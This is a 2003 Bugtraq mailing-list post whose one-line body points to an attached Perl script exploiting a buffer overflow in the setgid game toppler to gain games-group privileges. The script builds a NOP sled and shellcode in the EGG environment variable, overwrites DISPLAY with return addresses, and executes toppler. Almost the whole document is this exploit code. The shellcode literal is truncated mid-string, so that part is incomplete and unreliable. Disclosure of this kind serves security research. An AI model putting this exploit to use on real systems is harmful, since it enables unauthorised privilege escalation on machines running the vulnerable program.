[29110] in bugtraq
gid games via toppler
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Sun Mar 2 17:22:16 2003
Message-ID: <000f01c2e0be$2679a6b0$24029dd9@tuborg>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
To: <bugtraq@securityfocus.com>
Date: Sun, 2 Mar 2003 14:18:00 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000C_01C2E0C6.87F03CD0"
------=_NextPart_000_000C_01C2E0C6.87F03CD0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Attached file should be self-explainatory.
--
kokanin/dtors/knud
------=_NextPart_000_000C_01C2E0C6.87F03CD0
Content-Type: application/octet-stream;
name="DSR-toppler.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="DSR-toppler.pl"
#!/usr/bin/perl
#kokanin@dtors.net playing a game
#hi bob
$len =3D 1024;
$ret =3D 0xbfbffd31;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9=
\x9d;
if (@ARGV =3D=3D 1) {
$offset =3D $ARGV[0];
}
=20
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .=3D $nop;
}
=20
$buffer .=3D $shellcode;
$new_ret =3D pack('l', ($ret + $offset));
=20
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
$buffer .=3D $new_ret;
}
local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20
exec("toppler 2>/dev/null");
------=_NextPart_000_000C_01C2E0C6.87F03CD0--
